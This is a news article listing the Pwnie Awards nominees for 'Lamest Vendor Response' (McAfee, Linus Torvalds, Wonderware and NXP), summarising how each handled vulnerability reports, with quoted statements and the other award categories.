14 DAY TRIAL // The Pwnie Awards are all about celebrating the greatest achievements and the most notable failures in the security industry. This year the awards committee had to pick 37 nominees out of a list of 134 submissions, and then place each of them in the proper category (there are 9 awards categories in total). The winners of each category will be announced at the BlackHat USA Conference which will be held in Las Vegas on the 6th of August.
"We've received some really good submissions and it was not an easy task to narrow them down to five nominees per category, but we hope that we've done a good job. The next step for the Pwnie Awards judges will gather in an undisclosed location prior to the award ceremony and vote on the winners," says the Pwnie team.
The nominees in the "Lamest Vendor Response" category are: McAfee, Linus Torvalds, Wonderware and NXP Technologies. These nominees made it to this category because of the "spectacular" way they managed various security issues.
McAfee and XSS vulnerabilities
McAfee, with the aid of its ScanAlert tool, deemed 60 web pages "hacker safe" even though the multiple XSS vulnerabilities made them anything but safe. The most ironic thing is that McAfee's ScanAlert site itself was vulnerable, but the most remarkable part of the incident is the statement issued by Joseph Pierini, director of Enterprise services: "Cross-site scripting can't be used to hack a server. You may be able to do other things with it. You may be able to do things that affect the end-user or the client. But the customer data protected with the server, in the database, isn't going to be compromised by a cross-site scripting attack, not directly."
Linus Torvalds and the silent patching policy
If you were wondering why Linus Torvalds made it into this category, here is what he had to say about security bugs: "So I personally consider security bugs to be just "normal bugs". I don't cover them up, but I also don't have any reason what-so-ever to think it's a good idea to track them and announce them as something special. One reason I refuse to bother with the whole security circus is that I think it glorifies - and thus encourages - the wrong behavior."
Wonderwave and the SCADA DDOS vulnerability
CORE security detected that SCADA, a software product of Wonderware, had a DDOS (denial of service) vulnerability and disclosed the information. The thing is that Wonderware took an incredibly long time to respond, not to mention that initially it wouldn't even acknowledge that the software had a vulnerability. The way that Wonderware handled the situation has been deemed by the awards committee and the security industry as "incompetent".
NXP and the Radboud University Researchers
Two researchers from the Dutch university mentioned above discovered that the security features of the Oyster card can be bypassed. NXP decided that the only way it can prevent Wouter Teepe and Bart Jacobs from publicizing their "Dismantling Mifare Classic" was by suing the university. Luckily enough, a court of law has recently ruled in favor of the two scientists.
The other eight awards categories are: Best Server-Side Bug, Best Client-Side Bug, Mass 0wnage, Most Innovative Research, Most Overhyped Bug, Best Song, Most Epic Fail, and Lifetime Achievement Award.